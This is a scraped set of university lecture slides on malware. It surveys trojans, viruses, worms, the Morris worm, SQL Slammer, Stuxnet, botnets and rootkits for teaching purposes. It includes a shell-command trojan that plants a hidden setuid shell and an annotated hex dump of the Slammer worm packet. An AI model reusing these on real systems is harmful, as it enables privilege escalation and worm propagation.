SlideShare a Scribd company logo
1 of 46
CS526 1
Information Security
CS 526
Topic 9
Malwares
Topic 9: Malware
CS526 Topic 9: Malware 2
Readings for This Lecture
• Wikipedia
• Malware
• Computer Virus
• Botnet
• Rootkit
• Morris Worm
Malware Features & Types
• Infectious:
– Viruses, worms
• Concealment:
– Trojan horses, logic bombs, rootkits
• Malware for stealing information:
– Spyware, keyloggers, screen scrapers
• Malware for profit:
– Dialers, scarewares, ransomware
• Malware as platform for other attacks
– Botnets, backdoors (trapdoors)
• Many malwares have characteristics of multiple types
CS526 Topic 9: Malware 3
CS526 Topic 9: Malware 4
Trojan Horse
Example: Attacker:
Place the following file
cp /bin/sh /tmp/.xxsh
chmod u+s,o+x /tmp/.xxsh
rm ./ls
ls $*
as /homes/victim/ls
• Victim
ls
• Software that appears to perform
a desirable function for the user
prior to run or install, but
(perhaps in addition to the
expected function) steals
information or harms the system.
• User tricked into executing
Trojan horse
– Expects (and sees) overt and
expected behavior
– Covertly perform malicious acts
with user’s authorization
CS526 Topic 9: Malware 5
Trapdoor or Backdoor
• Secret entry point into a system
– Specific user identifier or password that circumvents
normal security procedures.
• Commonly used by developers
– Could be included in a compiler.
CS526 Topic 9: Malware 6
Logic Bomb
• Embedded in legitimate programs
• Activated when specified conditions met
– E.g., presence/absence of some file; Particular
date/time or particular user
• When triggered, typically damages system
– Modify/delete files/disks
Example of Logic Bomb
• In 1982, the Trans-Siberian Pipeline incident
occurred. A KGB operative was to steal the plans
for a sophisticated control system and its
software from a Canadian firm, for use on their
Siberian pipeline. The CIA was tipped off by
documents in the Farewell Dossier and had the
company insert a logic bomb in the program for
sabotage purposes. This eventually resulted in
“the most monumental non-nuclear explosion
and fire ever seen from space”.
CS526 Topic 9: Malware 7
Spyware
• Malware that collects little bits of information at a
time about users without their knowledge
– Keyloggers: stealthly tracking and logging key strokes
– Screen scrapers: stealthly reading data from a
computer display
– May also tracking browsing habit
– May also re-direct browsing and display ads
CS526 Topic 9: Malware 8
Scareware
• Malware that scares victims into take actions that
ultimately end up compromising our own security.
– E.g., paying for and installing fake anti-virus products
CS526 Topic 9: Malware 9
CS526 Topic 9: Malware 10
Ransomware
• Holds a computer system, or the data it contains, hostage
against its user by demanding a ransom.
– Disable an essential system service or lock the display at system
startup
– Encrypt some of the user's personal files, originally referred to as
cryptoviruses, cryptotrojans or cryptoworms
• Victim user has to
– enter a code obtainable only after wiring payment to the attacker
or sending an SMS message
– buy a decryption or removal tool
CS526 Topic 9: Malware 11
CS526 Topic 9: Malware 12
Virus
• Attach itself to a host (often a program) and replicate
itself
• Self-replicating code
– Self-replicating Trojan horses
– Alters normal code with “infected” version
• Operates when infected code executed
If spread condition then
For target files
if not infected then alter to include virus
Perform malicious action
Execute normal program
CS526 Topic 9: Malware 13
Worm
• Self-replicating malware that does not require a
host program
• Propagates a fully working version of itself to other
machines
• Carries a payload performing hidden tasks
– Backdoors, spam relays, DDoS agents; …
• Phases
– Probing  Exploitation  Replication  Payload
General Worm Trends
• Speed of spreading
– Slow to fast to stealthy
• Vector of infection
– Single to varied
– Exploiting software vulnerabilities to exploiting human
vulnerabilities
• Payloads
– From “no malicious payloads beyond spreading” to
botnets, spywares, and physical systems
CS526 Topic 9: Malware 14
CS526 Topic 9: Malware 15
Morris Worm
(November 1988)
• First major worm
• Written by Robert
Morris
– Son of former chief
scientist of NSA’s
National Computer
Security Center
What comes next: 1 11 21 1211 111221?
CS526 Topic 9: Malware 16
Morris Worm Description
• Two parts
– Main program to spread worm
• look for other machines that could be infected
• try to find ways of infiltrating these machines
– Vector program (99 lines of C)
• compiled and run on the infected machines
• transferred main program to continue attack
CS526 Topic 9: Malware 17
Vector 1: Debug feature of
sendmail
• Sendmail
– Listens on port 25 (SMTP port)
– Some systems back then compiled it with DEBUG
option on
• Debug feature gives
– The ability to send a shell script and execute on the
host
CS526 Topic 9: Malware 18
Vector 2: Exploiting fingerd
• What does finger do?
• Finger output
arthur.cs.purdue.edu% finger ninghui
Login name: ninghui In real life: Ninghui Li
Directory: /homes/ninghui Shell: /bin/csh
Since Sep 28 14:36:12 on pts/15 from csdhcp-120-173 (9 seconds
idle)
New mail received Tue Sep 28 14:36:04 2010;
unread since Tue Sep 28 14:36:05 2010
No Plan.
CS526 Topic 9: Malware 19
Vector 2: Exploiting fingerd
• Fingerd
– Listen on port 79
• It uses the function gets
– Fingerd expects an input string
– Worm writes long string to internal 512-byte buffer
• Overrides return address to jump to shell code
CS526 Topic 9: Malware 20
Vector 3: Exploiting Trust in
Remote Login
• Remote login on UNIX
– rlogin, rsh
• Trusting mechanism
– Trusted machines have the same user accounts
– Users from trusted machines do not need to enter
passwords
– /etc/host.equiv – system wide trusted hosts file
– /.rhosts and ~/.rhosts – users’ trusted hosts file
Host aaa.xyz.com
/etc/host.equiv
bbb.xyz.com
Host bbb.xyz.com
User alice
rlogin
CS526 Topic 9: Malware 21
Vector 3: Exploiting Trust in
Remote Login
• Worm exploited trust information
– Examining trusted hosts files
– Assume reciprocal trust
• If X trusts Y, then maybe Y trusts X
• Password cracking
– Worm coming in through fingerd was running as
daemon (not root) so needed to break into accounts
to use .rhosts feature
– Read /etc/passwd, used ~400 common password
strings & local dictionary to do a dictionary attack
CS526 Topic 9: Malware 22
Other Features of The Worm
• Self-hiding
– Program is shown as 'sh' when ps
– Files didn’t show up in ls
• Find targets using several mechanisms:
• 'netstat -r -n‘, /etc/hosts, …
• Compromise multiple hosts in parallel
– When worm successfully connects, forks a child to
continue the infection while the parent keeps trying
new hosts
• Worm has no malicious payload
• Where does the damage come from?
Damage
• One host may be repeatedly compromised
• Supposedly designed to gauge the size of the
Internet
• The following bug made it more damaging.
– Asks a host whether it is compromised; however, even
if it answers yes, still compromise it with probability
1/8.
CS526 Topic 9: Malware 23
CS526 Topic 9: Malware 24
Increasing propagation speed
• Code Red, July 2001
– Affects Microsoft Index Server 2.0,
– Exploits known buffer overflow in Idq.dll
– Vulnerable population (360,000 servers) infected in 14 hours
• SQL Slammer, January 2003
– Affects in Microsoft SQL 2000
– Exploits known months ahead of worm outbreak
• Buffer overflow vulnerability reported in June 2002
• Patched released in July 2002 (Bulletin MS02-39)
– Vulnerable population infected in less than 10 minutes
CS526 Topic 9: Malware 25
Slammer Worms (Jan., 2003)
SQL Server 2000
SQLSERVR.EXE
• MS SQL Server 2000 receives a request of the worm
– SQLSERVR.EXE process listens on UDP Port 1434
CS526 Topic 9: Malware 26
0000: 4500 0194 b6db 0000 6d11 2e2d 89e5 0a9c E...¶Û..m..-.å..
0010: cb08 07c7 1052 059a 0180 bda8 0401 0101 Ë..Ç.R....½¨....
0020: 0101 0101 0101 0101 0101 0101 0101 0101 ................
0030: 0101 0101 0101 0101 0101 0101 0101 0101 ................
0040: 0101 0101 0101 0101 0101 0101 0101 0101 ................
0050: 0101 0101 0101 0101 0101 0101 0101 0101 ................
0060: 0101 0101 0101 0101 0101 0101 0101 0101 ................
0070: 0101 0101 0101 0101 0101 0101 01dc c9b0 .............ÜÉ°
0080: 42eb 0e01 0101 0101 0101 70ae 4201 70ae Bë........p®B.p®
0090: 4290 9090 9090 9090 9068 dcc9 b042 b801 B........hÜÉ°B¸.
00a0: 0101 0131 c9b1 1850 e2fd 3501 0101 0550 ...1ɱ.Pâý5....P
00b0: 89e5 5168 2e64 6c6c 6865 6c33 3268 6b65 .åQh.dllhel32hke
00c0: 726e 5168 6f75 6e74 6869 636b 4368 4765 rnQhounthickChGe
00d0: 7454 66b9 6c6c 5168 3332 2e64 6877 7332 tTf¹llQh32.dhws2
00e0: 5f66 b965 7451 6873 6f63 6b66 b974 6f51 _f¹etQhsockf¹toQ
00f0: 6873 656e 64be 1810 ae42 8d45 d450 ff16 hsend¾..®B.EÔP..
0100: 508d 45e0 508d 45f0 50ff 1650 be10 10ae P.EàP.EðP..P¾..®
0110: 428b 1e8b 033d 558b ec51 7405 be1c 10ae B....=U.ìQt.¾..®
0120: 42ff 16ff d031 c951 5150 81f1 0301 049b B...Ð1ÉQQP.ñ....
0130: 81f1 0101 0101 518d 45cc 508b 45c0 50ff .ñ....Q.EÌP.EÀP.
0140: 166a 116a 026a 02ff d050 8d45 c450 8b45 .j.j.j..ÐP.EÄP.E
0150: c050 ff16 89c6 09db 81f3 3c61 d9ff 8b45 ÀP...Æ.Û..óa...E
0160: b48d 0c40 8d14 88c1 e204 01c2 c1e2 0829 ´..@...Áâ..ÂÁâ.)
0170: c28d 0490 01d8 8945 b46a 108d 45b0 5031 Â....Ø.E´j..E°P1
0180: c951 6681 f178 0151 8d45 0350 8b45 ac50 ÉQf.ñx.Q.E.P.E¬P
0190: ffd6 ebca .ÖëÊ
The 0x01
characters overflow
the buffer and spill
into the stack right
up to the return
address
This value overwrites the return
address and points it to a location
in sqlsort.dll which effectively
calls a jump to %esp
UDP packet
header
This byte signals the
SQL Server to store
the contents of the
packet in the buffer
Restore payload, set
up socket structure,
and get the seed for
the random number
generator
Main loop of
Slammer: generate
new random IP
address, push
arguments onto stack,
call send method, loop
around
NOP slide
This is the first
instruction to get
executed. It jumps
control to here.
Slammer’s code is 376 bytes!
CS526 Topic 9: Malware 27
Research Worms
• Warhol Worms
– Could infect all vulnerable hosts in 15 minutes – 1 hour
– Uses optimized scanning in three phases
• Phase 1: initial hit list of potentially vulnerable hosts
• Phase 2: local subnet scanning
• Phase 3: permutation scanning for complete, self-coordinated
coverage, all instances pick a random host as starting target
and follow up with hosts in a particular order (the same order
for all instances); if a target host is already compromised, pick
another random host
• Flash Worms
– Could infect all vulnerable hosts in 30 seconds
– Determines a complete hit list of servers with relevant service
open and include it with the worm
CS526 Topic 9: Malware 28
Email Worms: Spreading as Email
Attachments
• Love Bug worm (ILOVEYOU worm) (2000):
– May 3, 2000: 5.5 to 10 billion dollars in damage
• MyDoom worm (2004)
– First identified in 26 January 2004:
– On 1 February 2004, about 1 million computers infected
with Mydoom begin a massive DDoS attack against the
SCO group
• Similar method use text messages on mobile
phones
Stuxnet: History (1)
• 2009 June: Earliest Stuxnet seen
– Does not use MS10-046
• Microsoft Security Bulletin MS10-046: Vulnerability in Windows Shell
Could Allow Remote Code Execution
– Does not have signed drivers
• 2010 Jan: Stuxnet driver signed
– With a valid certificate belonging to Realtek Semiconductors
• 2010 June: Virusblokada reports W32.Stuxnet
– Stuxnet use MS10-046
– Verisign revokes Realtek certificate
• 2010 July: Eset identify new Stuxnet driver
– With a valid certificate belonging to JMicron Technology Corp
• 2010 July: Siemens report they are investigating malware SCADA
systems
– Verisign revokes JMicron certificate
CS526 Topic 9: Malware 29
History (2)
• 2010 Aug: Microsoft issues MS10-046
– Patches windows shell shortcut vulnerability
• 2010 Sept: Microsoft issues MS10-061
– Patches Printer Spooler Vulnerability
• 2010 Sept: Iran nuclear plant hit by delay
– Warm weather blamed
– Measured temperatures were at historical averages
• 2010 Oct: Iran arrest “spies”
– Spies who attempted to sabotage the country's nuclear
programme
– Russian nuclear nuclear experts flee Iran
CS526 Topic 9: Malware 30
Scenario (3)
• The malicious binaries need to be signed to avoid suspicion
– Two digital certificates were compromised
– High probability that the digital certificates/keys were physically
stolen from the companies premises
– Realtek and JMicron are in close proximity
CS526 Topic 9: Malware 31
Scenario (4)
• Initial Infection
– Stuxnet needed to be introduced to the targeted environment
• Insider
• Willing third party
• Unwilling third party such as a contractor
– Delivery method
• USB drive
• Windows Maintenance Laptop
CS526 Topic 9: Malware 32
Scenario (5)
• Infection Spread
– Look for Windows computer that program the PLC’s (Called Field
PG)
• The Field PG are typically not network
• Spread the Infection on computers on the local LAN
– Zero-day vulnerabilities
– Two-year old vulnerability
– Spread to all available USB drives
– When a USB drive is connected to the Field PG, the Infection
jumps to the Field PG
• The “airgap” is thus breached
CS526 Topic 9: Malware 33
Scenario (6)
• Target Infection
– Look for Specific PLC
• Running Step 7 Operating System
– Change PLC code
• Sabotage system
• Hide modifications
– Command and Control may not be possible
• Due to the “airgap”
• Functionality already embedded
CS526 Topic 9: Malware 34
Command & Control
• Stuxnet contacts the command and control server
– Test if can connect to:
• www.windowsupdate.com
• www.msn.com
– On port 80
– Sends some basic information about the compromised computer
to the attacker
– www.mypremierfutbol.com
– www.todaysfutbol.com
– The two URLs above previously pointed to servers in Malaysia
and Denmark
CS526 Topic 9: Malware 35
Command & Control (2)
CS526 Topic 9: Malware 36
Windows Rootkit Functionality
• Stuxnet has the ability to hide copies of its files copied to removable drives
• Stuxnet extracts Resource 201 as MrxNet.sys.
– The driver is registered as a service creating the following registry entry:
– HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesMRxNet”I
magePath” = “%System%driversmrxnet.sys”
– The driver file is a digitally signed with a legitimate Realtek digital certificate.
– The driver then filters(hides) files that :
• Files with a “.LNK” extension having a size of 4,171 bytes.•
• Files named “~WTR[FOUR NUMBERS].TMP”,
– whose size is between 4Kb and 8Mb; the sum of the four
numbers, modulo 10 is null. For example, 4+1+3+2=10=0
mod 10
• Examples:
– Copy of Copy of Copy of Copy of Shortcut to.lnk
– Copy of Shortcut to.lnk
– ~wtr4141.tmp
CS526 Topic 9: Malware 37
Propagation Methods: Network
• Peer-to-peer communication and updates
• Infecting WinCC machines via a hardcoded database server
password
• Propagating through network shares
• Propagating through the MS10-061 Print Spooler Zero-Day
Vulnerability
• Propagating through the MS08-067 Windows Server Service
Vulnerability
CS526 Topic 9: Malware 38
Propagation Methods: USB
• LNK Vulnerability (CVE-2010-2568)
• AutoRun.Inf
CS526 Topic 9: Malware 39
What was the target?
• Bushehr Nuclear Plant in Iran
– 60% Infections in Iran
– No other commercial gain
– Stuxnet complexity
– Stuxnet self destruct date
– Siemens specific PLC’s
CS526 Topic 9: Malware 40
Conclusion
• Stuxnet represents the first of many milestones in malicious
code history
– It is the first to exploit multiple 0-day vulnerabilities,
– Compromise two digital certificates,
– And inject code into industrial control systems
– and hide the code from the operator.
• Stuxnet is of such great complexity
– Requiring significant resources to develop
– That few attackers will be capable of producing a similar
threat
• Stuxnet has highlighted direct-attack attempts on critical
infrastructure are possible and not just theory or movie plotlines.
CS526 Topic 9: Malware 41
CS526 Topic 9: Malware 46
Zombie & Botnet
• Secretly takes over another networked computer
by exploiting software flows
• Builds the compromised computers into a
zombie network or botnet
– a collection of compromised machines running
programs, usually referred to as worms, Trojan
horses, or backdoors, under a common command and
control infrastructure.
• Uses it to indirectly launch attacks
– E.g., DDoS, phishing, spamming, cracking
CS526 Topic 9: Malware 47
Rootkit
• A rootkit is software that enables continued privileged
access to a computer while actively hiding its presence
from administrators by subverting standard operating
system functionality or other applications.
• Emphasis is on hiding information from administrators’
view, so that malware is not detected
– E.g., hiding processes, files, opened network connections, etc
• Example: Sony BMG copy protection rootkit scandal
– In 2005, Sony BMG included Extended Copy Protection on
music CDs, which are automatically installed on Windows on
CDs are played.
Types of Rootkits
• User-level rootkits
– Replace utilities such as ps, ls, ifconfig, etc
– Replace key libraries
– Detectable by utilities like tripwire
• Kernel-level rootkits
– Replace or hook key kernel functions
– Through, e.g., loadable kernel modules or direct kernel memory
access
– A common detection strategy: compare the view obtained by
enumerating kernel data structures with that obtained by the API
interface
– Can be defended by kernel-driver signing (required by 64-bit
windows)
CS526 Topic 9: Malware 48
CS526 Topic 9: Malware 50
How does a computer get infected with
malware or being intruded?
• Executes malicious code via user actions (email attachment,
download and execute trojan horses, or inserting USB
drives)
• Buggy programs accept malicious input
– daemon programs that receive network traffic
– client programs (e.g., web browser, mail client) that
receive input data from network
– Programs Read malicious files with buggy file reader
program
• Configuration errors (e.g., weak passwords, guest accounts,
DEBUG options, etc)
• Physical access to computer
CS526 51
Coming Attractions …
• Web Security
Topic 9: Malware

More Related Content

Similar to virusessssßsssssssssssssssssssssssssssssssss.ppt

Botnetsand applications
Botnetsand applicationsBotnetsand applications
Botnetsand applications
UltraUploader
 
Wrath of Ransomware_Longinus Timochenco
Wrath of Ransomware_Longinus TimochencoWrath of Ransomware_Longinus Timochenco
Wrath of Ransomware_Longinus Timochenco
Longinus Timochenco
 
Mayhem malware
Mayhem malwareMayhem malware
Mayhem malware
Akash Deep
 
Full-System Emulation Achieving Successful Automated Dynamic Analysis of Evas...
Full-System Emulation Achieving Successful Automated Dynamic Analysis of Evas...Full-System Emulation Achieving Successful Automated Dynamic Analysis of Evas...
Full-System Emulation Achieving Successful Automated Dynamic Analysis of Evas...
Lastline, Inc.
 
Kunal - Introduction to backtrack - ClubHack2008
Kunal - Introduction to backtrack - ClubHack2008Kunal - Introduction to backtrack - ClubHack2008
Kunal - Introduction to backtrack - ClubHack2008
ClubHack
 
Workshop on BackTrack live CD
Workshop on BackTrack live CDWorkshop on BackTrack live CD
Workshop on BackTrack live CD
amiable_indian
 
Kunal - Introduction to BackTrack - ClubHack2008
Kunal - Introduction to BackTrack - ClubHack2008Kunal - Introduction to BackTrack - ClubHack2008
Kunal - Introduction to BackTrack - ClubHack2008
ClubHack
 
Алексей Старов - Как проводить киберраследования?
Алексей Старов - Как проводить киберраследования?Алексей Старов - Как проводить киберраследования?
Алексей Старов - Как проводить киберраследования?
HackIT Ukraine
 

Similar to virusessssßsssssssssssssssssssssssssssssssss.ppt (20)

How to stay protected against ransomware
How to stay protected against ransomwareHow to stay protected against ransomware
How to stay protected against ransomware
 
Cloud Device Insecurity
Cloud Device InsecurityCloud Device Insecurity
Cloud Device Insecurity
 
Botnetsand applications
Botnetsand applicationsBotnetsand applications
Botnetsand applications
 
Wrath of Ransomware_Longinus Timochenco
Wrath of Ransomware_Longinus TimochencoWrath of Ransomware_Longinus Timochenco
Wrath of Ransomware_Longinus Timochenco
 
Botnets Attacks.pptx
Botnets Attacks.pptxBotnets Attacks.pptx
Botnets Attacks.pptx
 
Information about malwares and Attacks.pptx
Information about malwares and Attacks.pptxInformation about malwares and Attacks.pptx
Information about malwares and Attacks.pptx
 
Dealing with legacy code
Dealing with legacy codeDealing with legacy code
Dealing with legacy code
 
Mayhem malware
Mayhem malwareMayhem malware
Mayhem malware
 
Supply Chain Attacks
Supply Chain AttacksSupply Chain Attacks
Supply Chain Attacks
 
Bsides-Philly-2016-Finding-A-Companys-BreakPoint
Bsides-Philly-2016-Finding-A-Companys-BreakPointBsides-Philly-2016-Finding-A-Companys-BreakPoint
Bsides-Philly-2016-Finding-A-Companys-BreakPoint
 
Full-System Emulation Achieving Successful Automated Dynamic Analysis of Evas...
Full-System Emulation Achieving Successful Automated Dynamic Analysis of Evas...Full-System Emulation Achieving Successful Automated Dynamic Analysis of Evas...
Full-System Emulation Achieving Successful Automated Dynamic Analysis of Evas...
 
Vulnerability Intelligence and Assessment with vulners.com
Vulnerability Intelligence and Assessment with vulners.comVulnerability Intelligence and Assessment with vulners.com
Vulnerability Intelligence and Assessment with vulners.com
 
computer viruses
computer virusescomputer viruses
computer viruses
 
How to measure your security response readiness?
How to measure your security response readiness?How to measure your security response readiness?
How to measure your security response readiness?
 
Kunal - Introduction to backtrack - ClubHack2008
Kunal - Introduction to backtrack - ClubHack2008Kunal - Introduction to backtrack - ClubHack2008
Kunal - Introduction to backtrack - ClubHack2008
 
Workshop on BackTrack live CD
Workshop on BackTrack live CDWorkshop on BackTrack live CD
Workshop on BackTrack live CD
 
Kunal - Introduction to BackTrack - ClubHack2008
Kunal - Introduction to BackTrack - ClubHack2008Kunal - Introduction to BackTrack - ClubHack2008
Kunal - Introduction to BackTrack - ClubHack2008
 
Алексей Старов - Как проводить киберраследования?
Алексей Старов - Как проводить киберраследования?Алексей Старов - Как проводить киберраследования?
Алексей Старов - Как проводить киберраследования?
 
Hacking 1224807880385377-9
Hacking 1224807880385377-9Hacking 1224807880385377-9
Hacking 1224807880385377-9
 
Threats, Vulnerabilities & Security measures in Linux
Threats, Vulnerabilities & Security measures in LinuxThreats, Vulnerabilities & Security measures in Linux
Threats, Vulnerabilities & Security measures in Linux
 

More from NioLemuelLazatinConc

core-4.pptxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
core-4.pptxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxcore-4.pptxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
core-4.pptxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
NioLemuelLazatinConc
 
core-1.pptxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
core-1.pptxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxcore-1.pptxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
core-1.pptxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
NioLemuelLazatinConc
 

More from NioLemuelLazatinConc (19)

WWW & INTERNET.pptxxxccccccccccccccvvvvvc
WWW & INTERNET.pptxxxccccccccccccccvvvvvcWWW & INTERNET.pptxxxccccccccccccccvvvvvc
WWW & INTERNET.pptxxxccccccccccccccvvvvvc
 
keyboard-201203151617.pptxxxxxxxxxxxxxxx
keyboard-201203151617.pptxxxxxxxxxxxxxxxkeyboard-201203151617.pptxxxxxxxxxxxxxxx
keyboard-201203151617.pptxxxxxxxxxxxxxxx
 
filipino cultural values.pptxxxxxxxxxxxx
filipino cultural values.pptxxxxxxxxxxxxfilipino cultural values.pptxxxxxxxxxxxx
filipino cultural values.pptxxxxxxxxxxxx
 
core-4.pptxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
core-4.pptxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxcore-4.pptxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
core-4.pptxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
 
CBS PRESENTATION.pptxxxxxxxxxxxxxxxxxxxxx
CBS PRESENTATION.pptxxxxxxxxxxxxxxxxxxxxxCBS PRESENTATION.pptxxxxxxxxxxxxxxxxxxxxx
CBS PRESENTATION.pptxxxxxxxxxxxxxxxxxxxxx
 
INTEREST.pptxxxxxxxxxxxxxxxxxxxxxxxxxxxx
INTEREST.pptxxxxxxxxxxxxxxxxxxxxxxxxxxxxINTEREST.pptxxxxxxxxxxxxxxxxxxxxxxxxxxxx
INTEREST.pptxxxxxxxxxxxxxxxxxxxxxxxxxxxx
 
core-1.pptxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
core-1.pptxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxcore-1.pptxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
core-1.pptxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
 
FINAL-POLTICAL-DYNAST-WPS-Office-11.pptx
FINAL-POLTICAL-DYNAST-WPS-Office-11.pptxFINAL-POLTICAL-DYNAST-WPS-Office-11.pptx
FINAL-POLTICAL-DYNAST-WPS-Office-11.pptx
 
PRICING-STRATEGY.pptxxxxxxxxxxxxxxxxxxxx
PRICING-STRATEGY.pptxxxxxxxxxxxxxxxxxxxxPRICING-STRATEGY.pptxxxxxxxxxxxxxxxxxxxx
PRICING-STRATEGY.pptxxxxxxxxxxxxxxxxxxxx
 
Storage-computer-fundamentals.pptttttttt
Storage-computer-fundamentals.ppttttttttStorage-computer-fundamentals.pptttttttt
Storage-computer-fundamentals.pptttttttt
 
lesson 1 philsys.pptxxxxxxccccccccccccccxc
lesson 1 philsys.pptxxxxxxccccccccccccccxclesson 1 philsys.pptxxxxxxccccccccccccccxc
lesson 1 philsys.pptxxxxxxccccccccccccccxc
 
POWER SUPPLY-WPS Office.pptx
POWER   SUPPLY-WPS Office.pptxPOWER   SUPPLY-WPS Office.pptx
POWER SUPPLY-WPS Office.pptx
 
FINAL DEMO TEACHING PPT.pptx
FINAL DEMO TEACHING PPT.pptxFINAL DEMO TEACHING PPT.pptx
FINAL DEMO TEACHING PPT.pptx
 
3A-NETWORK-TOOLS.pptx
3A-NETWORK-TOOLS.pptx3A-NETWORK-TOOLS.pptx
3A-NETWORK-TOOLS.pptx
 
FINAL DEMO TEACHING PPT.pptx
FINAL DEMO TEACHING PPT.pptxFINAL DEMO TEACHING PPT.pptx
FINAL DEMO TEACHING PPT.pptx
 
rqa ims demoS.pptx
rqa ims demoS.pptxrqa ims demoS.pptx
rqa ims demoS.pptx
 
SSI MARKETING PPT.pptx
SSI MARKETING PPT.pptxSSI MARKETING PPT.pptx
SSI MARKETING PPT.pptx
 
COMPUTER MAINTENANCE TECHNOLOGY ppt.pptx
COMPUTER MAINTENANCE TECHNOLOGY ppt.pptxCOMPUTER MAINTENANCE TECHNOLOGY ppt.pptx
COMPUTER MAINTENANCE TECHNOLOGY ppt.pptx
 
COMPUTER FUNDAMENTALS PPT.pptx
COMPUTER FUNDAMENTALS PPT.pptxCOMPUTER FUNDAMENTALS PPT.pptx
COMPUTER FUNDAMENTALS PPT.pptx
 

Recently uploaded

The basics of sentences session 3pptx.pptx
The basics of sentences session 3pptx.pptxThe basics of sentences session 3pptx.pptx
The basics of sentences session 3pptx.pptx
heathfieldcps1
 
1029 - Danh muc Sach Giao Khoa 10 . pdf
1029 -  Danh muc Sach Giao Khoa 10 . pdf1029 -  Danh muc Sach Giao Khoa 10 . pdf
1029 - Danh muc Sach Giao Khoa 10 . pdf
QucHHunhnh
 
Russian Escort Service in Delhi 11k Hotel Foreigner Russian Call Girls in Delhi
Russian Escort Service in Delhi 11k Hotel Foreigner Russian Call Girls in DelhiRussian Escort Service in Delhi 11k Hotel Foreigner Russian Call Girls in Delhi
Russian Escort Service in Delhi 11k Hotel Foreigner Russian Call Girls in Delhi
kauryashika82
 
Activity 01 - Artificial Culture (1).pdf
Activity 01 - Artificial Culture (1).pdfActivity 01 - Artificial Culture (1).pdf
Activity 01 - Artificial Culture (1).pdf
ciinovamais
 
Beyond the EU: DORA and NIS 2 Directive's Global Impact
Beyond the EU: DORA and NIS 2 Directive's Global ImpactBeyond the EU: DORA and NIS 2 Directive's Global Impact
Beyond the EU: DORA and NIS 2 Directive's Global Impact
PECB
 
Making and Justifying Mathematical Decisions.pdf
Making and Justifying Mathematical Decisions.pdfMaking and Justifying Mathematical Decisions.pdf
Making and Justifying Mathematical Decisions.pdf
Chris Hunter
 
The basics of sentences session 2pptx copy.pptx
The basics of sentences session 2pptx copy.pptxThe basics of sentences session 2pptx copy.pptx
The basics of sentences session 2pptx copy.pptx
heathfieldcps1
 

Recently uploaded (20)

The basics of sentences session 3pptx.pptx
The basics of sentences session 3pptx.pptxThe basics of sentences session 3pptx.pptx
The basics of sentences session 3pptx.pptx
 
PROCESS RECORDING FORMAT.docx
PROCESS      RECORDING        FORMAT.docxPROCESS      RECORDING        FORMAT.docx
PROCESS RECORDING FORMAT.docx
 
1029 - Danh muc Sach Giao Khoa 10 . pdf
1029 -  Danh muc Sach Giao Khoa 10 . pdf1029 -  Danh muc Sach Giao Khoa 10 . pdf
1029 - Danh muc Sach Giao Khoa 10 . pdf
 
Unit-IV; Professional Sales Representative (PSR).pptx
Unit-IV; Professional Sales Representative (PSR).pptxUnit-IV; Professional Sales Representative (PSR).pptx
Unit-IV; Professional Sales Representative (PSR).pptx
 
Key note speaker Neum_Admir Softic_ENG.pdf
Key note speaker Neum_Admir Softic_ENG.pdfKey note speaker Neum_Admir Softic_ENG.pdf
Key note speaker Neum_Admir Softic_ENG.pdf
 
Application orientated numerical on hev.ppt
Application orientated numerical on hev.pptApplication orientated numerical on hev.ppt
Application orientated numerical on hev.ppt
 
Measures of Central Tendency: Mean, Median and Mode
Measures of Central Tendency: Mean, Median and ModeMeasures of Central Tendency: Mean, Median and Mode
Measures of Central Tendency: Mean, Median and Mode
 
Russian Escort Service in Delhi 11k Hotel Foreigner Russian Call Girls in Delhi
Russian Escort Service in Delhi 11k Hotel Foreigner Russian Call Girls in DelhiRussian Escort Service in Delhi 11k Hotel Foreigner Russian Call Girls in Delhi
Russian Escort Service in Delhi 11k Hotel Foreigner Russian Call Girls in Delhi
 
Activity 01 - Artificial Culture (1).pdf
Activity 01 - Artificial Culture (1).pdfActivity 01 - Artificial Culture (1).pdf
Activity 01 - Artificial Culture (1).pdf
 
ComPTIA Overview | Comptia Security+ Book SY0-701
ComPTIA Overview | Comptia Security+ Book SY0-701ComPTIA Overview | Comptia Security+ Book SY0-701
ComPTIA Overview | Comptia Security+ Book SY0-701
 
Sociology 101 Demonstration of Learning Exhibit
Sociology 101 Demonstration of Learning ExhibitSociology 101 Demonstration of Learning Exhibit
Sociology 101 Demonstration of Learning Exhibit
 
Beyond the EU: DORA and NIS 2 Directive's Global Impact
Beyond the EU: DORA and NIS 2 Directive's Global ImpactBeyond the EU: DORA and NIS 2 Directive's Global Impact
Beyond the EU: DORA and NIS 2 Directive's Global Impact
 
Unit-IV- Pharma. Marketing Channels.pptx
Unit-IV- Pharma. Marketing Channels.pptxUnit-IV- Pharma. Marketing Channels.pptx
Unit-IV- Pharma. Marketing Channels.pptx
 
Holdier Curriculum Vitae (April 2024).pdf
Holdier Curriculum Vitae (April 2024).pdfHoldier Curriculum Vitae (April 2024).pdf
Holdier Curriculum Vitae (April 2024).pdf
 
Making and Justifying Mathematical Decisions.pdf
Making and Justifying Mathematical Decisions.pdfMaking and Justifying Mathematical Decisions.pdf
Making and Justifying Mathematical Decisions.pdf
 
2024-NATIONAL-LEARNING-CAMP-AND-OTHER.pptx
2024-NATIONAL-LEARNING-CAMP-AND-OTHER.pptx2024-NATIONAL-LEARNING-CAMP-AND-OTHER.pptx
2024-NATIONAL-LEARNING-CAMP-AND-OTHER.pptx
 
Class 11th Physics NEET formula sheet pdf
Class 11th Physics NEET formula sheet pdfClass 11th Physics NEET formula sheet pdf
Class 11th Physics NEET formula sheet pdf
 
The basics of sentences session 2pptx copy.pptx
The basics of sentences session 2pptx copy.pptxThe basics of sentences session 2pptx copy.pptx
The basics of sentences session 2pptx copy.pptx
 
Food Chain and Food Web (Ecosystem) EVS, B. Pharmacy 1st Year, Sem-II
